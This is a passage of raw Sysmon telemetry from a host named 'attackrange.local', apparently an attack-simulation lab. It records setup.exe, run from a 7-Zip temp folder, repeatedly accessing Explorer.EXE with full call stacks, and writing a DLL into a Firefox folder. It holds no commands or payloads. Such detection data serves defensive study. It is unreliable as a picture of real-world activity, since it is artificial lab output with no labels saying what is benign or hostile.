ll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-heap-l1-1-0.dll2021-01-18 13:59:52.177 10341000x800000000000000014375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 